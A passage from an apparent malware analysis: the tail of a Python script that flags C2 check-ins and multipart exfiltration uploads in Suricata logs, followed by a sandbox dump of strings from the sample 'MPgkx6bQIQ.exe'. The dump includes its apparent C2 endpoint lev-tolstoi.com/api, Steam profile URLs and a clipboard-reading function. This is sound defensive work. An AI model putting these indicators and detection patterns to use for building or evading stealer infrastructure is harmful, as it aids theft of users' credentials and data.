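            if ev["tls"].get("ja3", {}).get("hash") in KNOWN_JA3:
                findings["ja3_match"].append(f'{ev["dest_ip"]}:{ev.get("dest_port", 443)}')
        elif kind == "http":
            h = ev["http"]
            host = h.get("hostname", "").lower()
            if h.get("http_method") != "POST" or h.get("url") != "/api":
                continue
            post_hosts.add(host)
            ctype = h.get("http_content_type", "")
            length = int(h.get("length", 0))
            if ctype.startswith("multipart/form-data") and length >= EXFIL_MIN_BYTES:
                findings["exfil_upload"].append(f"{host} {length}B")
            elif ctype.startswith("application/x-www-form-urlencoded") and length <= CHECKIN_MAX_BYTES:
                findings["c2_checkin"].append(host)
    # Hosts that took POST /api traffic but are absent from the static config
    # are new indicators: here that is lev-tolstoi.com.
    for host in sorted(post_hosts - CONFIG_C2):
        findings["c2_not_in_config"].append(host)
    return dict(findings)


if __name__ == "__main__":
    for key, values in triage(EVE_LINES).items():
        print(f"{key:18s} {', '.join(values)}")
```

Run against live eve.json with `triage(open("/var/log/suricata/eve.json"))`; the DNS and JA3 matches are cheap and work on encrypted traffic, while the check-in and upload findings only appear where the sensor sees the HTTP layer.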
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.5.dr | String found in binary or memory: http://upx.sf.net
Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000951000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.fa
Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000951000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/
Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/en/
Source: MPgkx6bQIQ.exe, 00000000.00000003.1587934272.0000000003049000.00000004.00000800.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1560060236.0000000003049000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/
Source: MPgkx6bQIQ.exe, 00000000.00000002.1694322227.0000000003049000.00000004.00000800.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1587934272.0000000003049000.00000004.00000800.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1560060236.0000000003049000.00000004.00000800.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1537846025.0000000003049000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api
Source: MPgkx6bQIQ.exe, 00000000.00000003.1537846025.0000000003049000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/apim
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badgW
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1561450032.000000000357B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1561450032.000000000357B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1561343578.000000000335A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1561450032.000000000357B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1561450032.000000000357B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1561450032.000000000357B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1561450032.000000000357B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49711 version: TLS 1.2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Code function: 0_2_004310D0 OpenClipboard, GetWindowLongW, GetClipboardData, GlobalLock, GlobalUnlock, CloseClipboard | 0_2_004310D0
